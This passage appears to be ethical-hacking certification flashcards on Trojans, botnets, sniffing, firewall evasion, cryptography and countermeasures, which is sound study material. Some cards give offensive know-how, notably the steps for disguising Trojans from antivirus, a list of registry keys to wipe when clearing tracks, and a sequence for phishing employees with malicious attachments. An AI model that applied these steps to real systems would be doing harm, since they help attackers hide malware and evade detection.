- Stealing credit cards or other sensitive credentials using phishing techniques - Integrating the server in a botnet in order to perform Denial of Service (DoS) or Distributed Denial of Service (DDoS) attack - Compromising a database - Obtaining closed-source applications - Hiding and redirecting traffic - Escalating privileges
Symptoms of Trojan Attacks
- The computer screen blinks, flips upside-down, or is inverted, so that everything is displayed backward. - The default background or wallpaper settings change automatically. - Printers automatically start printing the document. - Web pages suddenly open without input from the user. - Color settings of the operating system (OS) change automatically. - Screensavers convert to a personal scrolling message. - Sound volume suddenly fluctuates all the way up or down. - Anti-virus programs are automatically disabled, and the data is corrupted, altered, or deleted from the system. - The date and time of the computer change. - The mouse cursor moves by itself. - The right-click takes the function of the left-click, and vice versa. - The pointer arrow of the mouse disappears completely. - The mouse pointer and automatic clicks on icons are uncontrollable. - The Windows Start button disappears. - Pop-ups with bizarre messages that suddenly appear. - Clipboard images and text appear to be manipulated. - The keyboard and mouse freeze. - Contacts receive emails from a user's email address that the user did not send. - Strange warnings or question boxes appear. - The taskbar disappears automatically. - The Task Manager is disabled. - The DVD-ROM drawer opens and closes automatically
Defend Against Firewall Evasion
- The configuration of the firewall should be performed in such a way that the IP address of an intruder should be filtered out. - Set the firewall ruleset to deny all traffic and enable only the services required. - If possible, create a unique user ID to run the firewall services. Rather than running the services using the administrator or root IDs. - Configure a remote syslog server and apply strict measures to protect it from malicious users. - Monitor firewall logs at regular intervals and investigates all suspicious log entries found. - By default, disable all FTP connections to or from the network. - Catalog and review all inbound and outbound traffic allowed through the firewall. - Run regular risk queries to identify vulnerable firewall rules. - Monitor user access to firewalls and control who can modify the firewall configuration. - Specify the source and destination IP addresses as well as the ports. - Notify the security policy administrator on firewall changes and document them. - Control physical access to the firewall. - Take regular backups of the firewall ruleset and configuration files. - Schedule regular firewall security audits.
General procedure for an exploit kit,
- The victim visits a legitimate website that is hosted on the compromised web server. - The victim is redirected through various intermediary servers. - The victim unknowingly lands on an exploit kit server hosting the exploit pack landing page. - The exploit kit gathers information on the victim, based on which it determines the exploit and delivers it to the victim's system. - If the exploit succeeds, a malware program is downloaded and executed to the victim's system.
Rootkit Trojan Tools
- Wingbird - Finfisher - GrayFish - ZeroAccess rootkit - SST - Pihar - EquationDrug - CPD - Whistler - Mybios - MBRoot (Sinowal) - MBR Locker - Mebroot - Mayachok - Mebratix - Guntior - Stoned - Yurn - Cidox
Monitoring the Specific Ports in WireShark
- tcp.port==23 - ip.addr==192.168.1.100 machine ip.addr==192.168.1.100 && tcp.port=23
Rules of Engagement (ROE)
--are the formal permissions to conduct a penetration test. --They provide certain rights and restrictions to the test team for performing the test, and help testers to overcome legal, federal, and policy-related restrictions to use different penetration testing tools and techniques.
Common flag configurations used for a probe packet include:
-A FIN probe with the FIN TCP flag set -An XMAS probe with the FIN, URG, and PUSH TCP flags set -A NULL probe with no TCP flags set -A SYN/ACK probe
Other Privilege Escalation Techniques
-Access Token Manipulation -Application Shimming -File Sys Permissions -Path Intercept -Scheduled Tasks -Launch Daemon -Plist modification -setuid and setgid -Web Shell .
Trojan Countermeasures
-Avoid opening email attachments received from unknown senders -Block all unnecessary ports at the host and firewall -Avoid accepting programs transferred by instant messaging -Harden weak, default configuration settings and disable unused functionality including protocols -Monitor the internal network traffic for odd ports or encrypted traffic -Avoid downloading and executing applications from untrusted sources -Install patches and security updates for the operating systems and applications -Scan external USB drives and DVDs with antivirus software before using -Restrict permissions within the desktop environment to prevent malicious -Run host-based antivirus, firewall, and intrusion detection software
IP Spoofing countermeasures
-Avoid trust relationships -Use firewalls and filtering mechanisms - Use random initial sequence numbers - Ingress filtering prohibits spoofed traffic from entering the Internet. -Egress filtering refers to a practice that aims at IP spoofing prevention by blocking the outgoing packets with a source address that is not inside. - SYN flooding countermeasures
Steps to manually detect hidden malware
-Check startup program entries in the registry editor -Check device drivers automatically loaded C:\Windows\System32\drivers -Check boot.ini or bcd entries -Check Windows services automatically started Go to RUN >Type services.msc > sort by Startup Type -Check startup folder C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
Port Scanning Countermeasures
-Configure firewall and IDS rules to detect and block probes -Snort (http://www.snort.org) is an intrusion detection and prevention technology that can be very useful, mainly because signatures are frequently available from the public authors -Block inbound ICMP message types and all outbound ICMP type-3 unreachable messages at border routers arranged in front of a company's main firewall. -Ensure that the anti-scanning and anti-spoofing rules are configured.
Symptoms of DoS Attacks
-Consumption of scarce and nonrenewable resources -Consumption of bandwidth, disk space, CPU time, or data structures - Actual physical destruction or alteration of network components -Destruction of programming and files in a computer system
Botnets can be used for
-DDoS attacks: Botnets can generate DDoS attacks, which eat up the bandwidth of the victims' computers. Botnets can also overload a system, wasting valuable host system resources and destroying network connectivity. -Spamming: Attackers use SOCKS proxy for spamming. They harvest email addresses from web pages or some other sources. -Sniffing traffic: A packet sniffer observes the data traffic entering a compromised machine. It allows an attacker to collect sensitive information such as credit card numbers and passwords. The sniffer also allows an attacker to steal information from one botnet and uses it against another botnet. In other words, botnets can rob one another. -Keylogging: Keylogging provides sensitive information, such as system passwords. Attackers use keylogging to harvest PayPal account login information. -Spreading new malware: Botnets can be used to spread new bots. -Installing advertisement add-ons: Botnets can be used to perpetrate "click fraud" by automating clicks. -Google AdSense abuse: Some AdSense companies permit showing Google ads on their websites for economic benefits. This allows an intruder to automate clicks on an ad, thus producing a percentage increase in the click queue. -Attacking IRC chat networks: Also called as clone attacks, these are similar to a DDoS attack. A master agent instructs each bot to link to thousands of clones within the IRC network, which can flood the network. -Manipulating online polls and games: Every botnet has a unique address, enabling it to manipulate online polls and games. -Mass identity theft: Botnets can produce a large number of emails pretending to be some reputable site such as eBay. This technique allows attackers to steal information for identity theft.
Ways hackers Use Trojan
-Delete or replace operating system's critical files -Generate fake traffic to create DoS attacks -Record screenshots, audio, and video of victim's PC -Use victim's PC for spamming and blasting email messages -Download spyware, adware, and malicious files -Disable firewalls and antivirus -Create backdoors to gain remote access -Infect victim's PC as a proxy server for relaying attacks -Use victim's PC as a botnet to perform DDoS attacks -Steal personal information such as passwords, security, codes, credit card information Encrypt the data and lock out the victim from accessing the machine
Objectives of Network Scanning
-Discover the network's live hosts, IP addresses, and open ports of live -Discover the operating system and system architecture of the target. This is also known as fingerprinting. -Discover the services running/listening on the target system. -Identify specific applications or versions of a particular service -Identify vulnerabilities in any of the network systems.
Netcraft
-Good for getting Sub-domains and Determining OS -provides internet security services including anti-fraud and anti-phishing services, application testing and PCI scanning. -They also analyze the market share of web servers, operating systems, hosting providers and SSL certificate authorities and other parameters of the internet.
Footprinting: Geo-locating Tools
-Google Earth -Wikimapia -Bing Maps -Yahoo Maps -National Geographic maps
Approaches to Prevent Session Hijacking
-HTTP Strict Transport Security (HSTS) -Token Binding - HTTP Public Key Pinning (HPKP)
Honeypot Tools
-KFSensor -Specter -HoneyBOT
Management Network Zone
-Known as the Secured Zone -Access to this zone is limited to authorized users. -Access to one area of the zone does not necessarily apply to another area of the zone. -It is a secured zone with strict policies
Password Cracking Tools
-L0phtCrack - password auditing and recovery app It recovers lost Microsoft Windows passwords with the help of dictionary, hybrid, rainbow table, and brute-force attacks, and it also checks the strength of the password -ophcrack - based on rainbow tables -RainbowCrack- cracks with rainbow tables. Uses time memory trade off -Cain & Abel -hashcat -John the Ripper and more...
Types of Honeypots
-Low interaction honeypot -Medium interaction honeypot -HIgh interaction honeypot -Production Honeypot -Research Honeypot
Clearing Online Tracks
-Remove Most Recently Used (MRU), delete cookies, clear cache, turn of AutoComplete, clear Toolbar data from browsers. Win10- Start>Settings>Personalization>Start (turn off "Show Most Used Apps" and "Show recently opened items in Jump Lists on Start or the taskbar" Win10- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer (remove key for "Recent Docs"). Delete all values except "(Default)" -HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\AppKey - stores the hotkeys. -HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts - is responsible for file extension association. -HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs - key maintains a list of recently opened or saved files via Windows Explorer-style dialog boxes. -HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 - stores the network locations.
Defend Against Privilege Escalation
-Use encryption technique to protect sensitive data -Run users and applications on the least privileges -Reduce the amount of code that runs with particular privilege -Implement multi-factor authentication and authorization -Perform debugging using bounds checkers and stress tests -Run services as unprivileged accounts -Test operating system and application coding errors and bugs thoroughly -Implement a privilege separation methodology to limit the scope of programming errors and bugs - Patch and update the kernel regularl
Defend Against Keyloggers
-Use pop-up blockers and avoid opening junk emails -Install anti-spyware/antivirus programs and keep the signatures up to date -Install professional firewall software and anti-keylogging software -Recognize phishing emails and delete them -Update and patch system software regularly to defend against keyloggers -Do not click on links in unwanted or doubtful emails that may point to malicious sites -Use keystroke interference software, which inserts randomized characters into every keystroke.
Why Session Hijacking is Successful?
-Weak session-ID generation algorithm or small session IDs: -Indefinite session-timeout: -Most countermeasures do not work without encryption: -Insecure handling of session IDs: -Computers using TCP/IP are vulnerable: -No account lockout for invalid session IDs:
How a computer gets infected by a virus
-When a user accepts files and downloads without checking properly for the source -Opening infected email attachments Installing pirated software -Not updating and not installing new versions of plug-ins -Not running the latest anti-virus application -Clicking malicious online ads -Using portable media -Connecting to untrusted network
Sarbanes Oxley Act (SOX)
-aims to protect investors and the public by increasing the accuracy and reliability of corporate disclosures. -describes records that organizations need to store and the duration of the storage
Internet zone
-known as the untrusted zone -is the part of the Internet that is outside the boundaries of an organization. -It is highly susceptible to security breaches, as there may be little or no security controls that can block an invasion.
DDoS Volumetric Attack Techniques
-o User Datagram Protocol (UDP) flood attack -o Internet Control Message Protocol (ICMP) flood attack -o Ping of Death attack -o Smurf attack -o Malformed IP packet flood attack -o Spoofed IP packet flood attack
Paranoid Policy
-policy forbids everything. -There is a strict restriction on all use of company computers, whether it is system usage or network usage. -There is either no Internet connection or severely limited Internet usage. Due to these overly severe restrictions, users often try to find ways around them.
How CAM Works
1. ARP request (anybody know this node?) 2. ARP broadcast by Switch 3. ARP replies used to fill CAM Table 1. Machine A broadcasts an ARP request to the switch - the request contains the IP address of the target machine (Machine B), along with the source machine's (Machine A) MAC and IP addresses. 2. The switch then broadcasts this ARP request to all the hosts in the network and waits for the reply. 3.Machine B possesses the target/destination IP address, so it sends an ARP reply along with its MAC address. The CAM table stores this MAC address along with the port on which this machine is connected. 4. Now the connection is successfully established, and Machine A forwards the traffic to Machine B, while Machine C is unable to see the traffic flowing between them Future traffic doesn't have to be broadcast
Vulnerability Assessment Types
1. Active- network scanner 2. Passive- sniffer 3. External- from internet 4. Internal- intranet 5. Host-based 6. Network 7. Application- testing web infrastructure 8. Wireless network
Cloud Security Control Layers
1. Application - SDLC, Binary analysis, Scanners, Web app firewalls, Transaction Sec 2. Information - DLP, CMF, Database activity monitoring, encryption 3. management - GRC, IAM, VA/VM, Patch management, Configuration management monitoring 4. Network - NIDS/NIPS, Firewalls, DPI, Anti-DDoS, QoS, DNSSEC, OAuth 5. trusted computing - hardware and software RoT and APIs 6. computer and storage - host-based firewall, HIDS/HIPS, integrity and file/ log management, encryption, masking 7. physical - physical plant security, CCTV, Guard
How an Attacker Hacks the Network Using Sniffers
1. Attacker connects to switch port 2. Runs discovery tools 3. IDs target/victim 4. Poisons target w/ ARP spoof 5. Traffic for victim goes to attacker 6. Attacker extracts data from traffic Longer Version Step 1: An attacker who decides to hack a network first discovers the appropriate switch to access the network and connects a system to one of the ports on the switch. Step 2: An attacker who succeeds in connecting to the network tries to determine network information such as topology of the network by using network discovery tools. Step 3: By analyzing the network topology, the attacker identifies the victim's machine to target his/her attacks. Step 4: An attacker who identifies a target machine uses ARP spoofing techniques to send a fake (spoofed) Address Resolution Protocol (ARP) messages. Step 5: The previous step helps the attacker to divert all the traffic from the victim's computer to the attacker's computer. This is a typical man-in-the-middle (MITM) type of attack. Step 6: Now the attacker can see all the data packets sent and received by the victim. The attacker can now extract the sensitive information from the packets, such as passwords, usernames, credit card details, PINs, etc.
Bypass Firewall via MITM Atk
1. Attacker performs DNS server poisoning 2. User A requests for www.certifiedhacker.com to the corporate DNS server 3. Corporate DNS server sends the IP address (127.22.16.64) of the attacker 4. User A accesses the attacker's malicious server 5. Attacker connects to the real host and tunnels the user's HTTP traffic 6. The malicious codes embedded in the attacker's web page are downloaded and executed on the user's machine
Types of Network-level Hijacking
1. Blind hijacking 2. UDP hijacking 3. TCP/IP 4. RST 5. Man-in-the-Middle: Packet Sniffer 6. IP Spoofing: Source Routed Packets
Evading Anti-Virus Techniques
1. Break the Trojan file into multiple pieces and zip them as a single file. 2. Always write your Trojan and embed it into an application 3. Change the Trojan's syntax: - Convert an EXE to VB script -Change .EXE extension to .DOC.EXE, .PPT.EXE or .PDF.EXE (Windows hides "known extensions," by default, so it shows up only as .DOC, .PPT and .PDF) 4. Change the content of the Trojan using a hex editor. 5. Change the checksum, and encrypt the file. 6. Never use Trojans downloaded from the Web (anti-virus detects these easily). 7. Use binder and splitter tools that are capable of changing the first few bytes of the Trojan programs. 8. Perform code obfuscation or morphing. Morphing is done to confuse the anti-virus program from differentiating between a malicious and harmless program.
Lawful Interception
1. Court order (requesting wiretap) 2. Service provider sets tap on exchange router 3. Tap relays to system for reconstruction 4. Reconstructed data sent to storage system 5. Storage system to Central Mangement Server (CMS) 6. Central Managemnt Server accessed by Law Enforcement agency Here, the network operator or service provider legally sanctions access to private network data for monitoring private communications like telephone calls and email messages. Such operations are carried out by the Law Enforcement Agencies (LEAs
Defend Against Password Cracking
1. Enable InfoSec audit to track password attacks 2. Avoid password reuse 3. Don't share password 4. Don't use dictionary words (in any language) 5. Don't use cleartext or weak encryption 6. Frequent password change policy <30 days 7. Secure password storage 8. NEVER use default password 9. Many characters of multiple types 10. Don't let apps store password 11. Use salt prefix or suffix (yours or system's) 12. SYSKEY 13. Never user dates of birth, names 14. Monitor server logs for brute force attack 15. Account lockout (strict settings)
Vulnerability Assessment Phase
1. Evaluate physical security 2. Check for misconfigs & human error 3. Vuln scans 4. ID & prioritize vulns 5. Apply business & tech context to scan results 6. Validate vulns through OSINT 7. Generate vuln scan report pg 145
Bypass Firewall via Proxy Server
1. Find an appropriate proxy server 2. On the Tools menu of any Internet browser, go to "Proxy Settings" and in the Internet Properties dialog box under Connections tab, click "LAN settings" 3. Under LAN Settings, click on a "Use a proxy server for your LAN" checkbox 4. In the Address box, type the IP address of the proxy server 5. In the Port box, type the port number that is used by the proxy server for client connections (by default, 8080) 6. Click to select "Bypass proxy server for local addresses" checkbox if you do not want the proxy server computer to be used when connected to a computer on the local network 7. Click OK to close the LAN Settings dialog box 8. Click OK again to close the Internet Properties dialog box
Footprinting Pen Testing
1. Get proper authorization 2.Define the Scope 3. Perform footprinting through search engines (google, yahoo, bing, ask) 4. Perform footprinting through web services (Netcrat, Pipl, Google Finance, Google Alerts) 5. Perform footprinting through social media (facebook, LinkedIn) 6. Perform website footprinting (Burp Suite, Web Data Extractor, HTTrack, Website Copier) 7. Perform email footprinting (emailTrackerPro, Yesware) 8. Gather Competitive Intel (Hoovers, LexisNexis, Business Wire) 9. Perform Whois footprinting(SmartWhois, Batch IP converter) 10. DNS footprinting (DNSstuff, DIG, MyDNSTools) 11. Network Footprinting (Path Analyzer Pro, VisualRoute) 12. Perform Social Engineering (evesdropping, shoulder surfing, dumpster diving) 13. Document all findings
Web Server Pen Testing
1. Identify the Traget 2. Search for information about the target 3. Social Engineering 4. Query the Whois Database 5. Document 6. Fingerprint web server 7. Crawl website 8. Enumerate web server directories 9. Perform directory traversal attack 10. Perform vulnerability scanning 11. Perform HTTP response-splitting attack 12. Perform web cache poisoning attack 13. Brute force SSH, FTP, and other services login credentials 14. Perform MITM attack 15. Perform web application penetration testing
Types of Stego based on Cover Medium
1. Image 2. Document 3. Folder 4. Video 5. Audio 6. Whitespace 7. Web 8. Spam/Email 9. DVD-ROM 10. Natural Text 11. Hidden OS 12. Source Code
Vulnerability Classification
1. Misconfig 2. Default installations 3. Buffer overflows 4. Unpatched svr 5. Design flaws 6. OS flaws 7. App flaws 8. Open svc 9. Default pwd
Defend Against NTFS Streams
1. Move suspect files to FAT partition 2. Use third party file integrity checker 3. Use third-party utilities to show and manipulate hidden streams such as EventSentry or adslist.exe 4. Avoid writing important or critical data to alternate data streams. 4. Enable real-time AV scanning 5. Enable AV dynamic updates
Social Engineering Pen-testing
1. Obtain authorization 2. Define scope of pen testing 3. Obtain a list of emails and contacts of predefined targets 4. Collect emails and contact details of employees in the target organization 5. Collect information using footprinting techniques 6. Create a script with specific pretexts 7. Email employees asking for personal information 8. Send and monitor emails with malicious attachments to target victims 8. Send phishing emails to target victims
Types of scanning
1. Port Scanning - Lists the open ports and services. 2. Network Scanning - Lists IP addresses. Network scanning is a procedure for identifying active hosts on a network, either to attack them or to assess the security of the network. 3. Vulnerability Scanning - Shows the presence of known weaknesses. Vulnerability scanning is a method used to check whether a system is exploitable by identifying its vulnerabilities.
Scanning Vulnerable System techniques
1. Random Scanning Technique 2. Hit-List Scanning technique 3. Topological scanning technique 4. Subnet scanning technique 5. Permutation Scanning technique
Types of Trojans
1. Remote Access Trojans 2. Backdoor Trojans 3. Botnet Trojans 4. Rootkit Trojans 5. E-Banking Trojans 6. Proxy Server Trojans 7. Covert Channel Trojans 8. Defacement Trojans 9. Service Protocol Trojans 10. Mobile Trojans 11. IoT Trojans 12. Security Software Disabler Trojans 13. Destructive Trojans 14. DDoS Attack Trojans 15. Command Shell Trojans
How RSA algorithm generates and verifies RSA signature
1. Signature Generation To sign a message m, entity A should do the following: o Compute m̃ = R(m), an integer in the range [0, n-1] o Compute s = m̃ d mod n o A's signature form is s 2.Signature Verification To verify A's signature s and recover the message m, B should do the following: o Obtain A's authentic public key (n, e) o Compute m̃ = se mod n o Verify that m̃ ∈MR; if not, reject the signature o Recover m = R-1(m
Types of Viruses
1. System or Boot Sector Virus 2. File Virus 3. Multipartite Virus 4. Macro Virus 5. Cluster Virus 6. Stealth Virus/Tunneling Virus 7. Encryption Virus 8. Sparse Infector Virus 9. Polymorphic Virus 10. Metamorphic Virus 11. Overwriting File or Cavity Virus 12. Companion Virus/Camouflage Virus 13. Shell Virus 14. File Extension Virus 15. Add-on Virus 16. Intrusive Virus 17. Direct Action or Transient Virus 18. Terminate and Stay Resident Virus (TSR) 19. FAT Virus 20. Logic Bomb Virus 21. Web Scripting Virus 22. Email Viru
Analyze Web Applications
1. The first step in analyzing a web app is to check for the application entry point, which can later serve as a gateway for attacks 2. Identify Server-Side Technologies: Server-side technologies or server-side scripting systems are used to generate dynamic web pages (web 2.0) requested by clients and are stored internally on the server. 3. Identify Server-Side Functionality: Server-side functionality refers to the ability of a server to execute programs on output web pages. User requests stimulate the scripts residing on the web server to display interactive web pages or websites. The server executes server-side scripts, which are invisible to the user. 4. Map the Attack Surface: Attackers then plan the attack surface area of the web app to target the specific, vulnerable area. Identify the various attack surfaces uncovered by the applications and the vulnerabilities that are associated with each one
Steps involved in LLMNR/NBT-NS poisoning
1. User sends a request to connect to the data sharing system, \\DataServer which she mistakenly typed as \\DtaServr. 2. The \\DataServer responds to the user saying that it does not know the host named \\DtaServr. 3. The user then performs LLMNR/NBT-NS broadcast to find out if anyone in the network knows the host name\\DtaServr. 4. The attacker replies to the user saying that it is \\DataServer and accepts user NTLMv2 hash and responds to the user with an error.
Switch Port Stealing
1. Uses MAC Flood to sniff packets 2. Fake ARP packets with target MAC as source and attacker's MAC as destination 3. Race Condition of attacker's flooded packets & target host packets makes switch change MAC binds 4. Attacker directs target host packets to his software port 5. Steals target host software port & sends ARP request to discover target host's IP address 6. ARP reply means target host's software port binding is restored & attacker can sniff packets going there
the steps to enumeration:
1. define network range 2. calculate subnet mask 3. host discovery 4. port scanning 5. NetBIOS enumeration 6. SNMP " 7. LDAP " 8. NTP " 9. SMTP " 10. DNS " 11. IPsec, VoIP, LInux, etc. 12. Document findings
IP Spoofing detection techniques:
Direct TTL Probes (checks TTL values) IPID Check (checks increments in IPIDs) TCP Flow Control (checks window size)
Types of Physical Security Control
o Preventive Control o Detective Control o Deterrent Control o Recovery Control o Compensating/Corrective Control
Mirai
A Botnet Tool A self-propagating botnet that infects poorly protected internet devices (IoT devices). -uses telnet port (23 or 2323) to find those devices that are still using their factory default username and passwo Features: -o Login attempts with 60 different factory default username and password pairs -o Built for multiple CPU architectures (x86, ARM, Sparc, PowerPC, Motorola) -o Connects to CnC to allows the attacker to specify an attack vector -o Increases bandwidth usage for infected bots -o Identify and remove competing malware -o Blocks remote administration ports Prevention: -o Using Anti-Trojan softwares and updating usernames and passwords can prevent Mirai DDoS botnet Trojan attack.
Bachosens
A Covert Trojan deployed against select targets using covert communication channels to evade detection. It is used to steal information and download additional malware onto compromised machines. The trojan creates a registry entry to run every time Windows starts, opens a backdoor to connect to its C2 server, and can then execute the following functions: -o Log keystrokes -o Download and execute files -o Copy files -o List files -o Delete files o Create directories -o Delete directories -o Change registry entries -o List processes -o Terminate processes
Slowloris Attack
A DDoS attack tool. It is used to perform layer 7 DDoS attack to take down web infrastructure. It uses perfectly legitimate HTTP traffic to take down a target server. Opens multiple connections These requests will not be complete, and as a result, the target server's maximum concurrent connection pool will be filled up and additional attempts of connection will be denied.
jSQL injection
A Java application for automatic SQL database injection. It is a lightweight application used to find database information from a distant server. Features o Multiple injection strategies: Normal, Error, Blind, and Time o Multiple injection structures: Standard, Zipped, Dump In One Shot o SQL engine to study and optimize SQL expressions o Injection of multiple targets o Creation and visualization of Web shell and SQL shell o Read and write files on host using injection
Advanced Encryption Standard (AES)
A National Institute of Standards and Technology (NIST) specification for the encryption of electronic data. o Symmetric key algorithm - both encryption and decryption are performed using the same key o Iterated block cipher - works by repeating the defined steps multiple times o It has a 128-bit block size, with key sizes of 128, 192, and 256 bits o works simultaneously at multiple network layers.
Sniffing Simple Network Management Protocol (SNMP)(161)
A TCP/IP based protocol used for exchanging management information between devices connected on a network. The first version does not offer strong security, which leads to transfer of data in clear text format. Attackers exploit the vulnerabilities in this version in order to acquire passwords in plain text.
Rootkit Trojans
A Trojan that allow someone to obtain root/admin-level access to the computer by executing the programs in the kit Are powerful as backdoors that specifically attack the root or operating system Compared to backdoors, this cannot be detected by observing services, system task list or registries They can not propagate by themselves, and that fact has precipitated a great confusion.It consists of three components a dropper, loader, and the rootkit itself
Nbstat Utility
A Windows utility that helps in troubleshooting NETBIOS name resolution problems. -a RemoteName -Displays the NetBIOS name table of a remote computer -A IpAddress -NetBIOS name table of a remote computer, specified by the IP address -c -Lists the contents of the NetBIOS name cache, -n -Displays the names registered locally by NetBIOS applications such as the server and redirector -r - Displays a count of all names resolved by broadcast or WINS server. -R - Purges the name cache and reloads all #PRE entries from LMHOSTS -RR - Releases and reregisters all names with the name server. -s -Lists the NetBIOS sessions table converting destination IP addresses to computer NetBIOS names -S - Lists the current NetBIOS sessions and their status with the IP addresses Interval - Redisplays selected statistics, pausing the number of seconds specified in Interval between each display.
Substitution cipher
A block of plaintext is replaced with ciphertext Units may be single letters, pairs of letters, or combinations of them, and so forth. The recipient performs inverse substitution to decipher the text. Examples include Beale cipher, autokey cipher, Gronsfeld cipher, and Hill cipher
Polymorphic Viruses
A code that mutates while keeping the original algorithm intact modify their code for each replication to avoid detection To enable polymorphic code, the virus has to have a polymorphic engine A well-written polymorphic virus therefore has no parts that stay the same on each infection virus consists of three components: the encrypted virus code, the decryptor routine, and the mutation engine
Anti-Virus Sensor Systems
A collection of computer software that detects and analyzes malicious code threats such as viruses, worm, and Trojans They are used along with Sheep dip computers
How a Sniffer Works
A computer connected to a local area network (LAN) has two addresses: a MAC Address and an Internet Protocol (IP) Address MAC address uniquely identifies each node in a network and is stored on the NIC The Ethernet protocol uses the MAC address to transfer data to and from a system while building data frames. The Data Link Layer of the OSI model uses an Ethernet header with the MAC address of the destination machine instead of the IP address. The Network Layer is responsible for mapping IP network addresses to the MAC address as required by the Data Link Protocol.
FAT and Logic Bomb Viruses
A computer virus that attacks the File Allocation Table (FAT). It destroys the index, making it impossible for a computer to locate files and can spread to files when the FAT attempts to access them, causing corruption to eventually penetrate the entire computer Essentially, this virus destroys the index, making it impossible for a computer to locate files
Steps involved in the IPsec process
A consumer sends a message to a service provider. The consumer's IPsec driver attempts to match the outgoing packet's address or the packet type against the IP filter. The IPsec driver notifies ISAKMP (Internet Security Association and Key Management Protocol) to initiate security negotiations with the service provider. The service provider's ISKAMP receives the security negotiations request. Both principles initiate a key exchange, establishing an ISAKMP SA (ISAKMP Security Association) and a shared secret key. Both principles discuss the security level for the information exchange, establishing both IPsec SAs and keys. Consumer's IPsec driver transfers packets to the appropriate connection type for transmission to the service provider. The provider receives the packets and transfers them to the IPsec driver. Provider's IPsec uses the inbound SA and key to check the digital signature and begin decryption. Provider's IPsec driver transfers decrypted packets to the OSI Transport layer for further processing.
Diffie-Hellman
A cryptographic protocol that allows two parties to establish a shared key over an insecure channel The system has two parameters called p and g o Parameter p is a prime number and o Parameter g (usually called a generator) is an integer less than p, with the following property: for every number n between 1 and p-1 inclusive, there is a power k of g such that n = g kmod p
DUHK (Don't Use Hard-Coded Keys)
A cryptographic vulnerability that allows attackers to obtain encryption keys used to secure VPNs and web sessions. This attack mainly affects any hardware/software using ANSI X9.31 Random Number Generator (RNG). The Pseudorandom number generators (PRNGs) generate random sequences of bits based on the initial secret value called a seed and the current state
DHCP Request/Reply Messages
A device that already has an IP address needs this to get other configuration parameters from a DHCP server. When the DHCP client receives a DHCP offer, the client immediately responds by sending back a DHCP request packet. A client can broadcast a DHCPINFORM message to request that any available server send its parameters on the usage of the network. DHCP servers respond with the requested parameters and/or default parameters carried in DHCP options of a DHCPACK message If a DHCP request comes from a hardware address that is in the DHCP server's reserved pool and the request is not for the IP address that this DHCP server offered, the DHCP server's offer is invalid. The DHCP server can put that IP address back into the pool and offer it to another client.
Domain Name System (DNS) Attacks
A domain name system (DNS) server translates a human-readable domain name (e.g., www.google.com) into a numerical IP address that routes communications between nodes. The attacker performs DNS attacks to obtain authentication credentials from Internet users Types o DNS Poisoning: Involves diverting users to a spoofed website by poisoning the DNS server or the DNS cache on the user's system o Cbersquatting: Involves conducting phishing scams by registering a domain name that is similar to a cloud service provider. o Domain Hijacking: Involves stealing a cloud service provider's domain name. o Domain Snipping: Involves registering an elapsed domain name.
RC5
A fast symmetric-key block cipher designed by Ronald Rivest for RSA Data Security (now RSA security) parameterized algorithm with a variable block size, variable key size, and a variable number of rounds block sizes can be 32, 64, or 128 bits. The range of the rounds can vary from 0 to 255, Routines o key expansion - secret key that a user provides is expanded to fill the key table o encryption - has three fundamental operations: integer addition, bitwise XOR, and variable rotatio o decryption
Differential Cryptanalysis
A form of cryptanalysis applicable to symmetric key algorithm it is the examination of differences in an input and how that affects the resultant difference in the output. It originally worked only with chosen plaintext. It could also work with known plaintext and ciphertext
OpenVAS
A framework of several services and tools offering a comprehensive and powerful vulnerability scanning and vulnerability management solution. The actual security scanner is accompanied with a regularly updated feed of Network Vulnerability Tests (NVTs), over 50,000 in total. multi-service & multi-tool vulnerability scanner/manager
What is svmap?
A free and Open Source scanner to identify sip devices and PBX servers on a target network. -It can also be helpful for systems administrators when used as a network inventory tool. -was designed to be faster than the competition by specifically targeting SIP over UDP. scans VoiP networks, looks for hosts and PBX servers svmap <target network range> svmap 192.168.0.1/24
What is a DLL File
A library that contains a set of code and data for carrying out a particular activity in Windows. Apps can then call on those DLL files when they need that activity performed. files are a lot like executable (EXE) files, except that they cannot be directly executed in Windows
Access Control Attack: Unauthorized Association
A major threat to a wireless network. -Prevention of this kind of attack depends on the method or technique that the attacker uses to get associated with the network It may take two forms: o Accidental association -involves connecting to the target network's AP from a neighboring organization's overlapping network without the victim's knowledge o Malicious association -done with the help of soft APs instead of corporate APs.
Firewalking
A method of collecting information about remote networks behind firewalls. It is a technique that uses TTL values to determine gateway ACL filters and map networks by analyzing IP packet response This method helps locate a firewall, additional probing permits fingerprinting and identification of vulnerabilities. It requires three hosts: o Firewalking host: The firewalking host is the system outside the target network, from which the data packets are sent to the destination host to gain more information about the target network. o Gateway host: The gateway host is the suspected firewall system on the target network, through which the data packet passes on its way to the target network. o Destination host: The destination host is the target system on the target network to which the data packets are addressed
Wiretapping
A method of monitoring telephone or Internet conversations by a third party with covert intentions. Typically, the attacker uses a small amount of electrical signal generated by the telephone wires to tap the conversation. This allows attackers to monitor, intercept, access, and record information contained in the data flow in a communication system. Also, know as telephone tapping *NOTE* Doing this without a warrant or the consent of the persons conducting the conversation is a criminal offense in most countries, and it is a punishable offense depending on the country's law.
Path Interception
A method of placing an executable in a particular path in such a way that it will be executed by the application in place of the legitimate target
Stream ciphers
A moderm symmetric key ciphers are plaintext digits combined with a key stream (pseudorandom cipher digit stream). the user applies the key to each bit, one at a time -Examples include RC4, SEAL, etc.
Block ciphers
A modern cipher that deterministic algorithm operating on block (group of bits) of fixed size with an unvarying transformation specified by a symmetric key. These are widely used to encrypt bulk data -Examples include DES, AES, IDEA, etc
RACE Integrity Primitives Evaluation Message Digest (RIPEMD-160)
A more secure version of the RIPEMED algorithm. In this algorithm, the compression function consists of 80 stages made up of 5 blocks that execute 16 times each. This process repeats twice by combining the results at the bottom using modulo 32 addition.
Birthday Attack
A name used to refer to a class of brute-force attacks against cryptographic hashes that makes the brute forcing easier. Birthday paradox is the probability that two or more people in a group of 23 share the same birthday is greater than 1⁄2.
False positives
